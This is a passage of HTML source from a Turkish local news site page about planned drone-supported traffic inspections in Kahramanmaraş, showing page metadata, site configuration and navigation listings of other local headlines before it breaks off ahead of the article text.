  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Drone destekli trafik denetimleri yapılacak</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="Kahramanmaraş İl Emniyet Müdürlüğü, 8 Ekim-15 Kasım tarihleri arasında trafiğin yoğun olduğu noktalarda havadan drone denetimlerinin yapılacağını duyurdu." />
<meta name="keywords" content="Drone destekli trafik denetimleri yapılacak" />
<meta name="news_keywords" content="Drone destekli trafik denetimleri yapılacak">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Drone destekli trafik denetimleri yapılacak" />
<meta property="og:description" content="Kahramanmaraş İl Emniyet Müdürlüğü, 8 Ekim-15 Kasım tarihleri arasında trafiğin yoğun olduğu noktalarda havadan drone denetimlerinin yapılacağını duyurdu." />
  <meta property="og:image" content="https://www.elbistaninsesi.com/images/haberler/2021/10/drone_destekli_trafik_denetimleri_yapilacak_h71450_6a535.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.elbistaninsesi.com/guncel/drone-destekli-trafik-denetimleri-yapilacak-h71450.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Drone destekli trafik denetimleri yapılacak" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/drone-destekli-trafik-denetimleri-yapilacak-h71450.html" />
<meta name="twitter:domain" content="https://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Drone destekli trafik denetimleri yapılacak" />
<meta name="twitter:description" content="Kahramanmaraş İl Emniyet Müdürlüğü, 8 Ekim-15 Kasım tarihleri arasında trafiğin yoğun olduğu noktalarda havadan drone denetimlerinin yapılacağını duyurdu." />
<meta name="twitter:image:src" content="https://www.elbistaninsesi.com/images/haberler/2021/10/drone_destekli_trafik_denetimleri_yapilacak_h71450_6a535.jpg" /><link rel="alternate" href="https://www.elbistaninsesi.com/guncel/drone-destekli-trafik-denetimleri-yapilacak-h71450.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="https://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="https://www.elbistaninsesi.com/guncel/drone-destekli-trafik-denetimleri-yapilacak-h71450.html">
<link rel="amphtml" href="https://www.elbistaninsesi.com/amp/guncel/drone-destekli-trafik-denetimleri-yapilacak-h71450.html">
  <link rel="image_src" type="image/jpeg" href="https://www.elbistaninsesi.com/images/haberler/2021/10/drone_destekli_trafik_denetimleri_yapilacak_h71450_6a535.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Drone destekli trafik denetimleri yapılacak" />
<meta itemprop="thumbnailUrl" content="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/drone_destekli_trafik_denetimleri_yapilacak_h71450_6a535.jpg" />
<meta itemprop="articleSection" content="Güncel" name="section" />
<meta itemprop="dateCreated" content="2021-10-05T16:57:13+02:00" />
<meta itemprop="image" content="https://www.elbistaninsesi.com/images/haberler/2021/10/drone_destekli_trafik_denetimleri_yapilacak_h71450_6a535.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Drone destekli trafik denetimleri yapılacak" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'https://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'https://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

<style>
.dikeyhaberler .haber {
    width: 197px;
}
.dikeyhaberler .haber img {
    width: 200px;
    height: 120px;
}
.row-fluid [class*="span"]:first-child {
    margin-left: 0;
}
.dikeyhaberler .haber:last-child {
    margin-left: 15px;
}
#syazar {
    background-color: #EFEEEE;
}
</style>    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">8.8855</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">10.3195</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">501.43</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1391.65</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/tarim-kredi-marketin-elbistan-subesi-aciliyor-h71454.html" title="Tarım Kredi Market’in Elbistan Şubesi açılıyor" >Tarım Kredi Market’in Elbistan Şubesi açılıyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/jandarma-trafikten-ogrencilere-egitim-semineri-h71453.html" title="Jandarma Trafik’ten öğrencilere eğitim semineri" >Jandarma Trafik’ten öğrencilere eğitim semineri</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/kahramanmaras-cift-doz-asida-maviye-bir-adim-daha-yaklasti-h71452.html" title="Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı" >Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/elbistan-belediyesi-cozumu-vatandasin-ayagina-goturecek-h71451.html" title="Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek" >Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/drone-destekli-trafik-denetimleri-yapilacak-h71450.html" title="Drone destekli trafik denetimleri yapılacak" >Drone destekli trafik denetimleri yapılacak</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/balda-gruplar-belli-oldu-h71449.html" title="BAL’da gruplar belli oldu" >BAL’da gruplar belli oldu</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/bahcesehir-koleji-ogrencilerini-teknoloji-ile-bulusturuyor-h71448.html" title="Bahçeşehir Koleji öğrencilerini teknoloji ile buluşturuyor" >Bahçeşehir Koleji öğrencilerini teknoloji ile buluşturuyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/tes-iste-secim-sureci-basladi-2-h71447.html" title="Tes-İş’te seçim süreci başladı" >Tes-İş’te seçim süreci başladı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/evinin-onunde-cinayete-kurban-gitti-h71446.html" title="Evinin önünde cinayete kurban gitti" >Evinin önünde cinayete kurban gitti</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/160-milyon-liralik-res-yatirimina-devlet-tesviki-h71445.html" title="160 milyon liralık RES yatırımına devlet teşviki" >160 milyon liralık RES yatırımına devlet teşviki</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="https://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="ac3c633b5f4b47012a41c7c5a6b08f9d779bd6b3" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Drone destekli trafik denetimleri yapılacak" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="https://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="https://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="https://www.elbistaninsesi.com/vefatlar" id="k7"    >Vefatlar</a>
<a title="Güncel" href="https://www.elbistaninsesi.com/guncel" id="k8" class="current"   >Güncel</a>
<a title="Politika" href="https://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="https://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="https://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="https://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="https://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="https://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="https://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="https://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="https://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="https://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="https://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="https://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="https://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="https://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="https://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="https://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/feleknaz-guner-76-yasinda-h71457.html" title="Feleknaz Güner 76 Yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/feleknaz_guner_76_yasinda_h71457_34a67.jpg" alt="Feleknaz Güner 76 Yaşında" />
Feleknaz Güner 76 Yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/huseyin-ozkisi-78-yasinda-h71456.html" title="Hüseyin Özkişi 78 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/huseyin_ozkisi_78_yasinda_h71456_b23db.jpg" alt="Hüseyin Özkişi 78 yaşında" />
Hüseyin Özkişi 78 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/anma-aynur-arslan-h71455.html" title="Anma / Aynur Arslan"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/anma_aynur_arslan_h71455_fb8d6.jpg" alt="Anma / Aynur Arslan" />
Anma / Aynur Arslan</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/anma-ismail-kupeli-h71435.html" title="Anma / İsmail Küpeli"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/anma_ismail_kupeli_h71435_0a91b.jpg" alt="Anma / İsmail Küpeli" />
Anma / İsmail Küpeli</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/tarim-kredi-marketin-elbistan-subesi-aciliyor-h71454.html" title="Tarım Kredi Market’in Elbistan Şubesi açılıyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/tarim_kredi_marketin_elbistan_subesi_aciliyor_h71454_08f4c.JPG" alt="Tarım Kredi Market’in Elbistan Şubesi açılıyor" />
Tarım Kredi Market’in Elbistan Şubesi açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/jandarma-trafikten-ogrencilere-egitim-semineri-h71453.html" title="Jandarma Trafik’ten öğrencilere eğitim semineri"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/jandarma_trafikten_ogrencilere_egitim_semineri_h71453_e1ad7.jpg" alt="Jandarma Trafik’ten öğrencilere eğitim semineri" />
Jandarma Trafik’ten öğrencilere eğitim semineri</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/kahramanmaras-cift-doz-asida-maviye-bir-adim-daha-yaklasti-h71452.html" title="Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/kahramanmaras_cift_doz_asida_maviye_bir_adim_daha_yaklasti_h71452_73f7c.jpg" alt="Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı" />
Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/elbistan-belediyesi-cozumu-vatandasin-ayagina-goturecek-h71451.html" title="Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/elbistan_belediyesi_cozumu_vatandasin_ayagina_goturecek_h71451_66dd3.jpg" alt="Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek" />
Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
